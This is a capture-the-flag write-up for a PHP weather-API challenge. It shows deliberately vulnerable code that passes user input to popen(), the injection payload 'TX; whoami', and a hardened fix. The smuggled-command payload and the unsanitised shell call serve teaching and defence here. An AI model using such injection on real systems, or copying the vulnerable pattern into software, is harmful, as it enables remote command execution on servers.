
Want to run this Docker container locally?
docker run -d -p 9018:80 --restart always --name flag-o joshbeck2024/ctf-weather-api-rce-flag-o
Objective: cat the file /flag/flag.txt
This webpage was kind of fun to write because it actually queries the NWS and provides current data based on State Codes like: TX.
We are given the code which looks like this:
<?php
$stateCode = $_GET['state-code'];
// echo $stateCode; // Debugging
// VULNERABILITY: User input is concatenated directly into the shell command without sanitization.
$program = '/usr/bin/python3 /var/www/html/fetch_data.py'." ".$stateCode;
// Use popen or exec to run the command
// $output = exec($program);
// Open a pipe to the program's output
$handle = popen($program, 'r');
// Read the output line by line
while(!feof($handle)) {
    $line = fgets($handle);
    echo $line;
    echo "<br><br>";
}
// Close the pipe
pclose($handle);
?>
The vulnerable piece is here:
$program = '/usr/bin/python3 /var/www/html/fetch_data.py'." ".$stateCode;
// Use the exec function to run the program and save its output in a variable
$output = exec($program);
On the back end, the PHP script runs fetch_data.py with python3 through a shell. If we hand the form a state code like ‘TX’, the command looks like this:
/usr/bin/python3 /var/www/html/fetch_data.py TX
In a shell such as Bash, a semicolon strings two commands together, and popen() hands our input to the shell as part of the command line. The exploit here would look like this:
TX; whoami
If we enter this into the web form, you’ll see that www-root appears at the bottom of the returned response. If you have walked through the previous flags, returning a reverse shell or simply running the cat command will be enough to knock this one out.

The objective is to cat the file /flag/flag.txt
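
For comparison, a hardened version of the script above, as an added example that is not part of the original challenge code. It assumes valid state codes are exactly two uppercase letters and PHP 7.4 or later (for the array form of proc_open); validate_state_code() is a helper name introduced here.

```php
<?php
// Added example: hardened variant of the challenge script, not the author's code.

/**
 * Return the state code if it is exactly two uppercase ASCII letters, else null.
 * Assumption: every valid code looks like "TX". Anything else, including
 * "TX; whoami", "$(id)" or "TX\n", is rejected before it reaches a command.
 */
function validate_state_code($raw): ?string
{
    if (!is_string($raw)) {
        // ?state-code[]=x arrives as an array, not a string
        return null;
    }
    // \A and \z anchor the whole string; "$" alone would allow a trailing newline
    return preg_match('/\A[A-Z]{2}\z/', $raw) === 1 ? $raw : null;
}

$stateCode = validate_state_code($_GET['state-code'] ?? null);
if ($stateCode === null) {
    http_response_code(400);
    exit('Invalid state code');
}

// Array form of proc_open (PHP 7.4+) executes the program directly, with no
// shell in between, so ";", "|", "&&" and "$()" have no special meaning.
$cmd = ['/usr/bin/python3', '/var/www/html/fetch_data.py', $stateCode];
$proc = proc_open($cmd, [1 => ['pipe', 'w']], $pipes);
if (!is_resource($proc)) {
    http_response_code(500);
    exit('Could not start fetch_data.py');
}

// Read the script's stdout line by line
while (($line = fgets($pipes[1])) !== false) {
    // Encode the output so upstream data cannot inject markup into the page
    echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "<br><br>";
}

fclose($pipes[1]);
proc_close($proc);
```

With this version, submitting TX; whoami returns a 400 response, and the input never becomes part of a shell command line.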
